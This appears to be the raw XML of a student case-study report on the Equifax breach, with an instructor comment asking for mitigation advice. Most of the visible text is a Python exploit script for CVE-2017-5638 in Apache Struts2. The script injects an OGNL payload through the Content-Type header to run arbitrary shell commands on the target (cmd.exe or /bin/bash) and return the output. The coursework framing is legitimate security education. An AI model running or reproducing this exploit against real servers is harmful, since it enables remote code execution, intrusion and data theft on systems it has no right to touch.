          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343A619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 xml:space="preserve">"(#p=new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.ProcessBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE398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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.redirectErrorStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(true)).(#process=#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1531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"(#ros=(@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.struts2.ServletActionContext@getResponse().getOutputStream()))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CEA1C2"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gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.commons.io.IOUtils</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@copy(#process.getInputStream(),#ros))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D204C9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payload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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ros.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B282BA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4F1E9E5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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD94A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headers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{'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D6A3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request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urllib2.Request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351AB9B"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page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urllib2.urlopen(request</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31467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except</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httplib.IncompleteRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069A91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page =</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e.partial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10897B8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0553BFA9"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print(page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC67EB"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return</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page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BA50C"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76D78ECE"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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E5FAF"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if</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__name__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'__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF99750"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import</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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EB0A1"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if</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len(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) !=</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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223ADEC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print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"[*] struts2_S2-045.py &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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&gt; &lt;</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&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781BE1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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766D9AA"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print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'[*] CVE: 2017-5638 - Apache Struts2 S2-045')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9300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spellStart"/>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xml:space="preserve"> =</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sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73DA74"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 xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90552D"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print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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 %s\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052092AB" w14:textId="77777777" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="000E4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E399FEB" w14:textId="7660FDD8" w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidRDefault="004D5F52" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidSect="001B2958">
      <w:head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h Gould" w:date="2018-10-22T09:01:00Z" w:initials="JG">
    <w:p w14:paraId="5788E0AB" w14:textId="77777777" w:rsidR="001B2958" w:rsidRPr="00681BF6" w:rsidRDefault="001B2958" w:rsidP="00294E93">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="00681BF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The discussion of what the victims did at the time is good, but make sure your mitigations sections also describe how other companies can mitigate the risk of this happening to them. For example: for ransomware, in addition to saying what the affected company did, how can other companies prevent this from happening to them?  This will help your final projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FF0AA" w14:textId="77777777" w:rsidR="001B2958" w:rsidRPr="00681BF6" w:rsidRDefault="001B2958" w:rsidP="00294E93">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D33D47A" w14:textId="486B4D7F" w:rsidR="001B2958" w:rsidRDefault="001B295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33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3D47A" w16cid:durableId="1F7810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CC51" w14:textId="77777777" w:rsidR="00773A1A" w:rsidRDefault="00773A1A" w:rsidP="00BB1E04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="41864B29" w14:textId="77777777" w:rsidR="00773A1A" w:rsidRDefault="00773A1A" w:rsidP="00BB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E3E51" w14:textId="77777777" w:rsidR="00773A1A" w:rsidRDefault="00773A1A" w:rsidP="00BB1E04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78A04354" w14:textId="77777777" w:rsidR="00773A1A" w:rsidRDefault="00773A1A" w:rsidP="00BB1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B89F" w14:textId="0C050F51" w:rsidR="001B2958" w:rsidRPr="00927312" w:rsidRDefault="001B2958">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00927312">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Joshua Gould – Equifax Report</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="0DCD06D9" w14:textId="77777777" w:rsidR="00927312" w:rsidRDefault="00927312"/>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Gould">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="370b07bd6881f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F6"/>
    <w:rsid w:val="0008424C"/>
    <w:rsid w:val="000E1B63"/>
    <w:rsid w:val="000E4CC2"/>
    <w:rsid w:val="00104B7E"/>
    <w:rsid w:val="001B2958"/>
    <w:rsid w:val="00294E93"/>
    <w:rsid w:val="0030178C"/>
    <w:rsid w:val="00316267"/>
    <w:rsid w:val="00416C2F"/>
    <w:rsid w:val="004D5F52"/>
    <w:rsid w:val="004F28D1"/>
    <w:rsid w:val="00566573"/>
    <w:rsid w:val="005E0AB2"/>
    <w:rsid w:val="00681BF6"/>
    <w:rsid w:val="006B474D"/>
    <w:rsid w:val="00725DD1"/>
    <w:rsid w:val="007652B8"/>
    <w:rsid w:val="00773A1A"/>
    <w:rsid w:val="007D02A2"/>
    <w:rsid w:val="009012BF"/>
    <w:rsid w:val="00927312"/>
    <w:rsid w:val="00BB1E04"/>
    <w:rsid w:val="00C50AF5"/>
    <w:rsid w:val="00C739BD"/>
    <w:rsid w:val="00C742FB"/>
    <w:rsid w:val="00C921B0"/>
    <w:rsid w:val="00D87BE5"/>
    <w:rsid w:val="00E36FC7"/>
    <w:rsid w:val="00E943C8"/>
    <w:rsid w:val="00EA4394"/>
    <w:rsid w:val="00F9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5B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{576DA847-7DC5-4F11-801D-E9F39A7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0AB2"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E0AB2"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005E0AB2"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E0AB2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005E0AB2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E0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B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5F52"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5F52"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB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04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB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04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00927312"/>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0E4CC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665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0221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="123895173">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="390035544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1240139593">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1343631827">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1219704447">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1580169124">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="75054382">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
